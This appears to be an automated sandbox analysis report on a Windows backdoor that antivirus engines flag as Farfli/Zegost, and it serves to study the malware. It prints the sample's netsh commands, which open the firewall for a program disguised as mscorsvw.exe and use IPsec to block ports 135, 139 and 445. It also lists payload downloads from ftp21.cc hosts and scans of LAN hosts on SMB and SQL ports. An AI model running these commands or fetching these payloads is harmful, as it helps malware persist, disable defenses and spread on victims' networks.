Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 1, 2024, 9:18 a.m. | July 1, 2024, 9:20 a.m. |
-
-
netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
2628 -
netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
2680 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
2732 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
2792 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
2856 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
2916 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
2972 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
3028 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
744 -
netsh.exe "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
1728
-
IP Address | Status | Action |
---|---|---|
1.226.84.135 | Active | Moloch |
104.78.73.222 | Active | Moloch |
110.11.158.238 | Active | Moloch |
118.184.169.48 | Active | Moloch |
119.203.212.165 | Active | Moloch |
16.162.201.176 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.175.23 | Active | Moloch |
193.228.196.69 | Active | Moloch |
211.108.60.155 | Active | Moloch |
31.184.207.62 | Active | Moloch |
43.198.152.240 | Active | Moloch |
45.113.194.127 | Active | Moloch |
51.161.196.188 | Active | Moloch |
93.189.62.83 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49935 104.78.73.222:443 |
C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com | 2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63 |
TLS 1.2 192.168.56.101:50023 93.189.62.83:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23 |
TLS 1.2 192.168.56.101:51486 93.189.62.83:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23 |
TLS 1.2 192.168.56.101:53840 93.189.62.83:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23 |
TLS 1.2 192.168.56.101:54343 193.228.196.69:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 75:ce:fc:4e:72:d9:c8:06:65:40:3b:ca:5a:f6:97:bf:df:c3:e8:ae |
suspicious_features | Connection to IP address | suspicious_request | GET http://118.184.169.48/dyndns/getip | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://43.198.152.240:8080/api/node/ip_validate |
domain | members.3322.org |
request | GET http://ssl.ftp21.cc/445.jpg |
request | GET http://hook.ftp21.cc/MpMgSvc.dll |
request | GET http://hook.ftp21.cc/MpMgSvc.jpg |
request | GET http://118.184.169.48/dyndns/getip |
request | GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8 |
request | GET http://hook.ftp21.cc/Hooks.jpg |
request | GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe |
request | GET http://hook.ftp21.cc/64.jpg |
request | GET http://down.ftp21.cc/Update.txt |
request | GET http://43.198.152.240:8080/api/node/ip_validate |
domain | ssl.ftp21.cc | description | Cocos Islands domain TLD | ||||||
domain | down.ftp21.cc | description | Cocos Islands domain TLD | ||||||
domain | hook.ftp21.cc | description | Cocos Islands domain TLD |
name | RT_VERSION | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0001f05c | size | 0x000003fc |
file | C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe |
section | {u'size_of_data': u'0x0000ac00', u'virtual_address': u'0x00014000', u'entropy': 7.924912120479621, u'name': u'UPX1', u'virtual_size': u'0x0000b000'} | entropy | 7.92491212048 | description | A section with a high entropy has been found | |||||||||
entropy | 0.966292134831 | description | Overall entropy of this PE file is high |
section | UPX0 | description | Section name indicates UPX | ||||||
section | UPX1 | description | Section name indicates UPX |
cmdline | netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP |
cmdline | netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP |
cmdline | netsh.exe ipsec static add policy name=Block |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP |
cmdline | netsh.exe ipsec static add filterlist name=Filter1 |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | netsh.exe ipsec static add filteraction name=FilteraAtion1 action=block |
cmdline | netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP |
cmdline | netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block |
cmdline | netsh.exe ipsec static set policy name=Block assign=y |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP |
cmdline | netsh.exe ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1 |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1 |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1 |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block |
host | 43.198.152.240 | |||
host | 51.161.196.188 |
service_name | clr_optimization_v3.0.30317_32 | service_path | C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.Farfli.4!c |
Elastic | malicious (moderate confidence) |
MicroWorld-eScan | Gen:Heur.Mint.Zard.30 |
CAT-QuickHeal | Trojan.Aksula.A |
Skyhigh | BehavesLike.Win32.Generic.pc |
McAfee | Artemis!3D3AEDFAEAF3 |
Cylance | Unsafe |
VIPRE | Gen:Heur.Mint.Zard.30 |
Sangfor | Suspicious.Win32.Save.a |
K7AntiVirus | Trojan ( 0040f7ad1 ) |
BitDefender | Gen:Heur.Mint.Zard.30 |
K7GW | Trojan ( 0040f7ad1 ) |
Cybereason | malicious.aeaf39 |
Arcabit | Trojan.Mint.Zard.30 |
Baidu | Win32.Trojan.Farfli.bg |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/Farfli.JU |
APEX | Malicious |
Avast | Win32:Evo-gen [Trj] |
Cynet | Malicious (score: 100) |
Kaspersky | UDS:Trojan.Win32.Generic |
Alibaba | Backdoor:Win32/Zegost.24e518cf |
Rising | Backdoor.Farfli!1.B6C5 (CLOUD) |
Emsisoft | Gen:Heur.Mint.Zard.30 (B) |
F-Secure | Trojan.TR/Crypt.FKM.Gen |
DrWeb | Trojan.Siggen28.63414 |
Zillya | Trojan.Farfli.Win32.91278 |
TrendMicro | TROJ_GEN.R002C0DFL24 |
McAfeeD | Real Protect-LS!3D3AEDFAEAF3 |
Trapmine | malicious.moderate.ml.score |
FireEye | Generic.mg.3d3aedfaeaf39544 |
Sophos | Mal/Behav-160 |
Ikarus | Backdoor.Win32.Zegost |
Jiangmin | Trojan.Generic.hoagb |
Detected | |
Avira | TR/Crypt.FKM.Gen |
Antiy-AVL | Trojan/Win32.Farfli |
Kingsoft | malware.kb.b.888 |
Gridinsoft | Trojan.Win32.Agent.sa |
Xcitium | Backdoor.Win32.Zegost.c@4m3x9i |
Microsoft | Backdoor:Win32/Zegost!pz |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
GData | Gen:Heur.Mint.Zard.30 |
Varist | W32/KillAV.AU.gen!Eldorado |
AhnLab-V3 | Backdoor/Win.NG.R582744 |
BitDefenderTheta | AI:Packer.BC223D901F |
DeepInstinct | MALICIOUS |
VBA32 | BScope.TrojanDDoS.Macri |
Malwarebytes | Trojan.Farfli.UPX |
dead_host | 192.168.3.1:445 |
dead_host | 192.168.3.120:135 |
dead_host | 192.168.3.123:445 |
dead_host | 192.168.3.119:445 |
dead_host | 192.168.0.28:445 |
dead_host | 192.168.0.65:445 |
dead_host | 192.168.3.105:445 |
dead_host | 192.168.3.109:445 |
dead_host | 110.11.158.238:53 |
dead_host | 192.168.3.142:445 |
dead_host | 192.168.0.54:445 |
dead_host | 192.168.3.121:445 |
dead_host | 192.168.3.134:445 |
dead_host | 192.168.3.120:1433 |
dead_host | 192.168.0.200:445 |
dead_host | 192.168.3.86:445 |
dead_host | 192.168.0.188:445 |
dead_host | 192.168.0.63:445 |
dead_host | 192.168.0.36:445 |
dead_host | 192.168.3.90:445 |
dead_host | 192.168.56.101:51321 |
dead_host | 192.168.56.101:50067 |
dead_host | 192.168.0.64:445 |
dead_host | 192.168.0.18:445 |
dead_host | 192.168.0.204:445 |
dead_host | 192.168.0.35:445 |
dead_host | 192.168.0.87:445 |
dead_host | 192.168.3.163:445 |
dead_host | 192.168.3.166:445 |
dead_host | 192.168.3.136:445 |
dead_host | 192.168.56.101:52234 |
dead_host | 192.168.3.97:445 |
dead_host | 192.168.3.102:445 |
dead_host | 192.168.56.101:54177 |
dead_host | 192.168.56.101:54165 |
dead_host | 192.168.56.101:49946 |
dead_host | 192.168.0.104:445 |
dead_host | 192.168.0.37:445 |
dead_host | 192.168.0.58:445 |
dead_host | 192.168.3.148:445 |
dead_host | 192.168.3.1:1433 |
dead_host | 192.168.3.122:1433 |
dead_host | 192.168.56.101:54172 |
dead_host | 192.168.0.19:445 |
dead_host | 192.168.3.85:445 |
dead_host | 192.168.3.128:445 |
dead_host | 192.168.3.103:445 |
dead_host | 192.168.56.101:52247 |
dead_host | 192.168.3.89:445 |
dead_host | 192.168.0.56:445 |